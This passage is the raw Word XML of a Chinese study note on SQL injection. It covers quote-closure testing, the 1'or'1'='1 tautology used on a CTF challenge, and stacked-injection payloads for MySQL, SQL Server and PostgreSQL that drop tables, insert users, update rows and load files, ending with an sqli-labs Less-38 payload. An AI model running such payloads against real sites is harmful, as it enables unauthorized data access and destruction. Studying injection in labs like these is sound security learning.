          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B2749" w14:textId="77777777" w:rsidR="00D41AB9" w:rsidRPr="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无报错则单引号闭合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599ED88" w14:textId="1452ACE8" w:rsidR="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错则单引号加括号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C00A03" w14:textId="77777777" w:rsidR="001F5B07" w:rsidRDefault="001F5B07" w:rsidP="00D41AB9"/>
    <w:p w14:paraId="787A4AEF" w14:textId="13F73AAD" w:rsidR="007C5E10" w:rsidRDefault="001F5B07" w:rsidP="007C5E10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007C5E10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果单引号不报错，双引号报错，然后尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E9171" w14:textId="6441C359" w:rsidR="007C5E10" w:rsidRPr="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>?id=1"</w:t>
      </w:r>
      <w:r w:rsidR="002B5BCA">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780CEE8B" w14:textId="77777777" w:rsidR="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无报错则双引号闭合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597AD14" w14:textId="23284874" w:rsidR="007C5E10" w:rsidRPr="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错则双引号加括号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC07F8" w14:textId="368A5BF9" w:rsidR="00B1140B" w:rsidRPr="00300BB3" w:rsidRDefault="00ED61D6" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00300BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00300BB3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A2E30" w14:textId="11EF38B8" w:rsidR="00ED61D6" w:rsidRPr="00AD4966" w:rsidRDefault="00B1140B" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4966">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>1'or'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF0DECD" w14:textId="41F9F608" w:rsidR="00B1140B" w:rsidRDefault="00B1140B" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能的语句情况：</w:t>
      </w:r>
      <w:r w:rsidRPr="00321DC3">
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1140B">
        <w:t xml:space="preserve"> * FROM Users WHERE Username='1' OR '1'='1' AND Password='1'OR '1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AB2943" w14:textId="482C3E26" w:rsidR="00B1140B" w:rsidRDefault="00B1140B" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句永远为真，故肯定会返回一些数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D329BB5" w14:textId="080DEA5D" w:rsidR="00301222" w:rsidRPr="00300BB3" w:rsidRDefault="00301222" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00300BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300BB3">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>[极客大挑战 2019]EasySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00300BB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300BB3">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0661AA6D" w14:textId="4A11F1E3" w:rsidR="00301222" w:rsidRDefault="00301222" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1140B">
        <w:t>1'or'1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可得到flag（确实是esay</w:t>
      </w:r>
      <w:r>
        <w:t>SQL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  <w:r w:rsidR="00400830">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A78C7C" w14:textId="6DEC1762" w:rsidR="00301222" w:rsidRDefault="00301222" w:rsidP="000874CF">
      <w:r w:rsidRPr="00301222">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12AE6E02" wp14:editId="0061D656">
            <wp:extent cx="1742400" cy="176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F108" w14:textId="77777777" w:rsidR="00300BB3" w:rsidRDefault="00300BB3" w:rsidP="000874CF"/>
    <w:p w14:paraId="1FF34599" w14:textId="04E1C701" w:rsidR="00301222" w:rsidRDefault="000F12DE" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00AD4966">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆叠注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77694821" w14:textId="4145542B" w:rsidR="001B3A08" w:rsidRPr="001B3A08" w:rsidRDefault="001B3A08" w:rsidP="001B3A08">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Sql server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Postgresql</w:t>
      </w:r>
      <w:r w:rsidR="00584031">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>均可行，但</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>oracle不能使用堆叠注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5AD0C" w14:textId="5747C54F" w:rsidR="00AD4966" w:rsidRPr="00EB080A" w:rsidRDefault="00AD4966" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB080A">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t xml:space="preserve">1;show </w:t>
      </w:r>
      <w:r w:rsidR="006543EA">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB080A">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>atabases</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB080A">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB080A">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>tables/columns form tablename</w:t>
      </w:r>
      <w:r w:rsidR="006543EA">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006543EA">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>;#</w:t>
      </w:r>
      <w:r w:rsidR="00B10906">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或者其他语句）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4AFBC8" w14:textId="0E7F5C20" w:rsidR="00AF7874" w:rsidRDefault="00AF7874" w:rsidP="000874CF">
      <w:pPr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即在</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB080A">
        <w:t>分号后执行其他sql语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDEC26" w14:textId="5DD573E0" w:rsidR="003673E6" w:rsidRDefault="003673E6" w:rsidP="000874CF">
      <w:pPr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又如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB519B" w14:textId="6D6859BE" w:rsidR="003673E6" w:rsidRPr="001B3A08" w:rsidRDefault="003673E6" w:rsidP="003673E6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003673E6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from student where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003673E6">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>id=1;create table test;</w:t>
      </w:r>
      <w:r w:rsidR="001B3A08">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当执行查询后，第一条显示查询信息，第二条则创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3A08">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07B41A" w14:textId="3AD724E2" w:rsidR="00300BB3" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id=1;drop table test;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78467689" w14:textId="3CD89FD2" w:rsidR="00EE1BCB" w:rsidRPr="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id=1;select load_file('c:/tmpupbbn.php');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0038A3" w14:textId="5D5F5741" w:rsidR="00EE1BCB" w:rsidRPr="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="00EE1BCB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id=1;insert into users(id,username,password)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>values('100','new','new');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53849255" w14:textId="77777777" w:rsidR="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Sql server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1BCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780994DE" w14:textId="5848A3EA" w:rsidR="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from test;create table sc3(ss CHAR(8))</w:t>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0093489E" w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201FC9F3" w14:textId="53528169" w:rsidR="00EE1BCB" w:rsidRPr="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from test;drop table sc3;</w:t>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0093489E" w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16450BE0" w14:textId="35B82443" w:rsidR="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453E9B7" w14:textId="2F3D324A" w:rsidR="00EE1BCB" w:rsidRDefault="00EE1BCB" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1BCB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from user_test;create table user_data(id DATE);</w:t>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0093489E" w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建一个表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5EEC9B" w14:textId="6093B038" w:rsidR="0093489E" w:rsidRDefault="0093489E" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from user_test;delete from user_data;</w:t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  <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除上面新建的</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>user_data</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C18B6" w14:textId="3949ABCD" w:rsidR="0093489E" w:rsidRDefault="0093489E" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from user_test;select 1,2,3;</w:t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  <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818D651" w14:textId="7CE4B23A" w:rsidR="0093489E" w:rsidRPr="00EE1BCB" w:rsidRDefault="0093489E" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from user_test;update user_test set name='modify' where name='</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>张三</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="0093489E">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097BB2BE" w14:textId="04E6233E" w:rsidR="00E01257" w:rsidRPr="00E01257" w:rsidRDefault="00E01257" w:rsidP="00E01257">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01257">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>堆叠查询可以执行任意的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01257">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL 语句，但是这种注入方式并不是十分完美。在我们的 Web 系统中，代码通常只返回一个查询结果，因此堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面无法看到返回结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01257">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>因此在读取数据时，建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01257">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>union注入。同时在使用堆叠注入之前，我们也需要知道一些数据库相关信息如表名，列名等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D35F365" w14:textId="499BB7FB" w:rsidR="00EE1BCB" w:rsidRPr="00D209E0" w:rsidRDefault="00D209E0" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>qli labs less 38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDF41E" w14:textId="6AE32804" w:rsidR="00D209E0" w:rsidRDefault="00D209E0" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDEC912" wp14:editId="27AB1F79">
            <wp:extent cx="5274310" cy="1494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2D1F" w14:textId="77777777" w:rsidR="00D209E0" w:rsidRDefault="00D209E0" w:rsidP="000874CF">
      <w:pPr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单引号闭合，构造堆叠注入p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27831119" w14:textId="7E11A17B" w:rsidR="00D209E0" w:rsidRDefault="00D209E0" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' ; insert into users(id,username,password) </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk87898612"/>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">values ('100',‘yyh’,‘my name haha’) </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D209E0">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CE4C6" w14:textId="77777777" w:rsidR="003445E1" w:rsidRDefault="003445E1" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471856BD" w14:textId="3D91216C" w:rsidR="003445E1" w:rsidRDefault="003445E1" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003445E1">
